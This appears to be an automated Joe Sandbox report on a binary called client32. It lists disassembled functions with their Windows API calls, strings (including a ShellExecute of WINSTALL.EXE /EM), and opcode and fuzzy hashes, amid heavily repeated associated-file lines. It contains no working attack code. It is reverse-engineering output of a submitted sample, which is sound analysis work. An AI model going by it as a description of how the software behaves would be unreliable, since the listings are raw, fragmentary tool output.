Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateEvent$CriticalException@8InitializeSectionThrowVersionXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
String ID: vector<T> too long
API String ID: 3908453871-3788999226
Opcode ID: a19368b116d5de523ae4107eef672715f039439dabb1407ef6e56aff718b5f08
Instruction ID: 38b2c4dcff0dedf9a92b00eefd602a69c273a846f0a1c46fad91db0527ff3e0a
Opcode Fuzzy Hash: a19368b116d5de523ae4107eef672715f039439dabb1407ef6e56aff718b5f08
Instruction Fuzzy Hash: A6514EB5D04705AFC714DF69C880AAAFBF8FB48704F50892EE55A97740EB74A904CBA0

Function 11065430 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,CF3D35D0,?,?,?), ref: 11065470
SetEvent.KERNEL32 ref: 1106549A
timeGetTime.WINMM ref: 110654D3
InterlockedDecrement.KERNEL32(?), ref: 110654F0
_free.LIBCMT ref: 11065578
LeaveCriticalSection.KERNEL32(?), ref: 11065581

Strings

Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms, xrefs: 1106554E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$DecrementEnterEventInterlockedLeaveTime_freetime
String ID: Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms
API String ID: 1154861362-2729525473
Opcode ID: d77fa92413a1a65b302bc16da95b1b73e0b8ab402638c7d2822101c89923dd69
Instruction ID: 3b3d7615ea4610ef5d080b5e58bc799fd5b460a4b46124fee3b0225fd41c603b
Opcode Fuzzy Hash: d77fa92413a1a65b302bc16da95b1b73e0b8ab402638c7d2822101c89923dd69
Instruction Fuzzy Hash: B4418775A00A059FD715CF64C998BAAFBF9FB48348F00855DE82AC7254C731FA00CBA1

Function 1100F2D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100F2FD
std::_Lockit::_Lockit.LIBCPMT ref: 1100F320
std::bad_exception::bad_exception.LIBCMT ref: 1100F3A4
__CxxThrowException@8.LIBCMT ref: 1100F3B2
std::_Lockit::_Lockit.LIBCPMT ref: 1100F3C5
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F3DF

Strings

bad cast, xrefs: 1100F39C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
Instruction ID: d39dcf25abbe8801d5c0a0784b2024497f923947b746a9a7221ebbb3b7ea5b8b
Opcode Fuzzy Hash: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
Instruction Fuzzy Hash: 6F31BF75D042659FDB55DF98C880BAEF7B4EB053B8F40826DD822A7290DB31B904DB92

Function 110310B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,CF3D35D0,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031146
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154

Strings

Kernel32.dll, xrefs: 110310DA
ProcessIdToSessionId, xrefs: 11031126

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
String ID: Kernel32.dll$ProcessIdToSessionId
API String ID: 1613046405-2825297712
Opcode ID: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
Instruction ID: dbcb6794e105daa586ddc3bbf804ff67aea9c2c21b85bbe8f4e4c15c2f8116d0
Opcode Fuzzy Hash: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
Instruction Fuzzy Hash: 9621A2B1D21269AFCB01DF99D884A9EFFB8FB49B15F10852BF521E3244D7B419018FA1

Function 11017670 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 67libraryloaderCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,CF3D35D0), ref: 1101769E
LoadLibraryA.KERNEL32(Kernel32.dll), ref: 110176AE
GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110176F2
SetLastError.KERNEL32(00000078), ref: 1101770D
FreeLibrary.KERNEL32(00000000), ref: 11017718

Strings

Kernel32.dll, xrefs: 110176A4
QueueUserWorkItem, xrefs: 110176E9

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateErrorEventFreeLastLoadProc
String ID: Kernel32.dll$QueueUserWorkItem
API String ID: 4285663087-4150702566
Opcode ID: d50a8dac8ccbab53729ea53da33bc6b9eacf9282e18db9930f8040b16a8e4b90
Instruction ID: f2f02a827eb8337154b6f90647cbee7355ef9528bb3155cd44b52246bb3bc4fa
Opcode Fuzzy Hash: d50a8dac8ccbab53729ea53da33bc6b9eacf9282e18db9930f8040b16a8e4b90
Instruction Fuzzy Hash: 7521E4B1D11638ABCB11CF99D988A9EFFB8FB49B14F10451BF511E2244C7B405018FA1

Function 110273F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

wsprintfA.USER32 ref: 1102741E

Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F

wsprintfA.USER32 ref: 11027448
ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B

Strings

open, xrefs: 11027494
"%sWINST32.EXE", xrefs: 11027442
"%sWINSTALL.EXE", xrefs: 11027418
/EM, xrefs: 11027488

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
API String ID: 816263943-3387570681
Opcode ID: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
Instruction ID: 425802901d1907c5be7fd2b9c3bfd6c49e25210cb6f83e26e9bc69af70aaa39f
Opcode Fuzzy Hash: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
Instruction Fuzzy Hash: B411C875E0131EABDB11EBB5CC45FAAF7A89B04708F5041F5E91597181EB31B9048B91

Function 1108B240 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64threadCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(?,00000000), ref: 1108B274
GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108B293
OpenProcess.KERNEL32(00000440,00000000,04000000,110EAA59,?,04000000,00000000,?,00000000,00000000,?,00000000,110EA93D,?,110EAA59,0000070B), ref: 1108B2A9

Strings

Progman, xrefs: 1108B250
Error. NULL hToken, xrefs: 1108B25B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessWindow$FindOpenThread
String ID: Error. NULL hToken$Progman
API String ID: 3432422346-976623215
Opcode ID: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
Instruction ID: 4ee04209679d4ac62f627f7e7d6e091cb71ded9887b28b928329626620bf84cb
Opcode Fuzzy Hash: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
Instruction Fuzzy Hash: 25119675E0122D9BD751DFA4D885BEEF7B8EF4C218F1081A9EE16E7240DB31A900C7A5

Function 110033B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFF), ref: 110033BE
GetSubMenu.USER32(00000000,00000000), ref: 110033EA
GetSubMenu.USER32(00000000,00000000), ref: 1100340C
DestroyMenu.USER32(00000000), ref: 1100341A

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

hMenu, xrefs: 110033D4
hSub, xrefs: 110033FC
..\CTL32\annotate.cpp, xrefs: 110033CF, 110033F7

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
Instruction ID: 24594387450efb2066981165f5525a36b814e5bc10ecad7e7e85ab1dcfd37f25
Opcode Fuzzy Hash: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
Instruction Fuzzy Hash: 71F0E93AF4066677D61352666CC5F4FE66C8B91AA8F110071F614BA684EE11A80051EA

Function 110032C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF9), ref: 110032CD
GetSubMenu.USER32(00000000,00000000), ref: 110032F3
GetMenuItemCount.USER32(00000000), ref: 11003317
DestroyMenu.USER32(00000000), ref: 11003329

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

hMenu, xrefs: 110032E3
hSub, xrefs: 11003309
..\CTL32\annotate.cpp, xrefs: 110032DE, 11003304

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 4241058051-934300333
Opcode ID: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
Instruction ID: d79372c4e35f96c7b6d882990e3a1748ca0edf213b09d886e21f34e7a2ab119d
Opcode Fuzzy Hash: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
Instruction Fuzzy Hash: 56F0E93AF4052777C21352663C49F8FF6684B81BA8F154071F911B5645EE14640051E6

Function 110ED520 Relevance: 12.1, APIs: 8, Instructions: 129fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110ED563

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
Instruction ID: 402bb12deb77936e5eeacb062a8de3ed675085140f67c3334ce786458653fa44
Opcode Fuzzy Hash: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
Instruction Fuzzy Hash: 3141A772E012199FD710CFA9D885BAEF7F8EF84719F10856AE916DB240DB35E500CB91

Function 110ED140 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
GlobalLock.KERNEL32(00000000), ref: 110ED19C
ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
GlobalFree.KERNEL32(00000000), ref: 110ED1DC

Memory Dump Source

